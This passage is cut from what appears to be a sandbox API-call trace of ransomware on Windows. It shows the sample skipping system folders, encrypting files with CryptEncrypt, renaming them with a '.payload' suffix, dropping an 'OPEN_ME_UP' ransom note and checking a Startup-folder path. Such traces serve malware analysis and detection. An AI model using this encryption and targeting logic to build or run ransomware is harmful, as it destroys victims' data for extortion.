lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.714] CloseHandle (hObject=0x438) returned 1 [0060.715] GetProcessHeap () returned 0x5e0000 [0060.715] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.715] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico_r00t_{nhhHyu}.payload") returned 65 [0060.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.716] GetProcessHeap () returned 0x5e0000 [0060.716] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.716] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0060.716] FindClose (in: hFindFile=0x606420 | out: hFindFile=0x606420) returned 1 [0060.716] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 66 [0060.716] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\graphics\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.719] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.720] CloseHandle (hObject=0x430) returned 1 [0060.720] GetProcessHeap () returned 0x5e0000 [0060.720] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.720] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0060.720] lstrcmpiW (lpString1="header.bmp", lpString2="Windows") returned -1 [0060.721] lstrcmpiW (lpString1="header.bmp", lpString2="$Recycle.bin") returned 1 [0060.721] lstrcmpiW (lpString1="header.bmp", lpString2="System Volume Information") returned -1 [0060.721] lstrcmpiW (lpString1="header.bmp", lpString2="Program Files") returned -1 [0060.721] lstrcmpiW (lpString1="header.bmp", lpString2="Program Files (x86)") returned -1 [0060.721] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned 36 [0060.721] StrStrIW (lpFirst="header.bmp", lpSrch=".payload") returned 0x0 [0060.721] lstrcmpW (lpString1="header.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.721] lstrcmpW (lpString1="header.bmp", lpString2="taridd") returned -1 [0060.721] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\header.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.721] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.721] GetTickCount () returned 0x114f9b3 [0060.721] GetTickCount () returned 0x114f9b3 [0060.721] GetTickCount () returned 0x114f9b3 [0060.721] GetTickCount () returned 0x114f9b3 [0060.721] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0060.722] GetProcessHeap () returned 0x5e0000 [0060.722] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.722] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0xe2c, lpOverlapped=0x0) returned 1 [0060.725] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffff1d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.726] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0xe2c, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0xe2c, lpOverlapped=0x0) returned 1 [0060.726] GetProcessHeap () returned 0x5e0000 [0060.726] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.726] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.726] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0060.726] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0060.726] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0060.726] CloseHandle (hObject=0x430) returned 1 [0060.727] GetProcessHeap () returned 0x5e0000 [0060.727] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.727] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\header.bmp_r00t_{nhhHyu}.payload") returned 58 [0060.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\header.bmp_r00t_{nhhhyu}.payload")) returned 1 [0060.727] GetProcessHeap () returned 0x5e0000 [0060.727] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.727] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0060.727] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Windows") returned -1 [0060.727] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="$Recycle.bin") returned 1 [0060.728] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="System Volume Information") returned -1 [0060.728] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Program Files") returned -1 [0060.728] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Program Files (x86)") returned -1 [0060.728] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 40 [0060.728] StrStrIW (lpFirst="netfx_Core.mzz", lpSrch=".payload") returned 0x0 [0060.728] lstrcmpW (lpString1="netfx_Core.mzz", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.728] lstrcmpW (lpString1="netfx_Core.mzz", lpString2="taridd") returned -1 [0060.728] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.728] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.728] GetTickCount () returned 0x114f9b3 [0060.728] GetTickCount () returned 0x114f9b3 [0060.728] GetTickCount () returned 0x114f9b3 [0060.728] GetTickCount () returned 0x114f9b3 [0060.728] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0060.728] GetProcessHeap () returned 0x5e0000 [0060.728] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.728] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0060.784] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.785] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0060.785] GetProcessHeap () returned 0x5e0000 [0060.785] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.785] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.785] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0060.786] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0060.787] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0060.787] CloseHandle (hObject=0x430) returned 1 [0061.573] GetProcessHeap () returned 0x5e0000 [0061.573] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0061.573] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz_r00t_{nhhHyu}.payload") returned 62 [0061.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz_r00t_{nhhhyu}.payload")) returned 1 [0061.574] GetProcessHeap () returned 0x5e0000 [0061.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0061.574] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0061.574] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Windows") returned -1 [0061.574] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="$Recycle.bin") returned 1 [0061.574] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="System Volume Information") returned -1 [0061.574] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Program Files") returned -1 [0061.574] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Program Files (x86)") returned -1 [0061.574] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 44 [0061.574] StrStrIW (lpFirst="netfx_Core_x64.msi", lpSrch=".payload") returned 0x0 [0061.574] lstrcmpW (lpString1="netfx_Core_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.574] lstrcmpW (lpString1="netfx_Core_x64.msi", lpString2="taridd") returned -1 [0061.574] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0061.575] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0061.575] GetTickCount () returned 0x114fd0e [0061.575] GetTickCount () returned 0x114fd0e [0061.575] GetTickCount () returned 0x114fd0e [0061.575] GetTickCount () returned 0x114fd0e [0061.575] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0061.576] GetProcessHeap () returned 0x5e0000 [0061.576] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0061.576] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.577] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.578] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.578] GetProcessHeap () returned 0x5e0000 [0061.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0061.578] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.578] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0061.579] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0061.579] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0061.579] CloseHandle (hObject=0x430) returned 1 [0061.635] GetProcessHeap () returned 0x5e0000 [0061.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0061.635] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi_r00t_{nhhHyu}.payload") returned 66 [0061.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi_r00t_{nhhhyu}.payload")) returned 1 [0061.636] GetProcessHeap () returned 0x5e0000 [0061.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0061.636] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0061.636] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Windows") returned -1 [0061.636] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="$Recycle.bin") returned 1 [0061.636] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="System Volume Information") returned -1 [0061.636] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Program Files") returned -1 [0061.636] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Program Files (x86)") returned -1 [0061.636] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 44 [0061.636] StrStrIW (lpFirst="netfx_Core_x86.msi", lpSrch=".payload") returned 0x0 [0061.636] lstrcmpW (lpString1="netfx_Core_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.636] lstrcmpW (lpString1="netfx_Core_x86.msi", lpString2="taridd") returned -1 [0061.637] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0061.637] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0061.637] GetTickCount () returned 0x114fd4d [0061.637] GetTickCount () returned 0x114fd4d [0061.637] GetTickCount () returned 0x114fd4d [0061.637] GetTickCount () returned 0x114fd4d [0061.637] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0061.637] GetProcessHeap () returned 0x5e0000 [0061.637] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0061.638] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.639] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.639] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0061.640] GetProcessHeap () returned 0x5e0000 [0061.640] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0061.640] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.640] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0061.642] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0061.642] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0061.642] CloseHandle (hObject=0x430) returned 1 [0061.758] GetProcessHeap () returned 0x5e0000 [0061.758] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0061.758] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi_r00t_{nhhHyu}.payload") returned 66 [0061.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi_r00t_{nhhhyu}.payload")) returned 1 [0061.759] GetProcessHeap () returned 0x5e0000 [0061.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0061.759] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0061.759] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Windows") returned -1 [0061.759] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="$Recycle.bin") returned 1 [0061.759] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="System Volume Information") returned -1 [0061.759] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Program Files") returned -1 [0061.759] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Program Files (x86)") returned -1 [0061.759] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 44 [0061.759] StrStrIW (lpFirst="netfx_Extended.mzz", lpSrch=".payload") returned 0x0 [0061.759] lstrcmpW (lpString1="netfx_Extended.mzz", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.759] lstrcmpW (lpString1="netfx_Extended.mzz", lpString2="taridd") returned -1 [0061.759] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0061.759] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0061.760] GetTickCount () returned 0x114fdba [0061.760] GetTickCount () returned 0x114fdba [0061.760] GetTickCount () returned 0x114fdba [0061.760] GetTickCount () returned 0x114fdba [0061.760] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0061.760] GetProcessHeap () returned 0x5e0000 [0061.760] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, 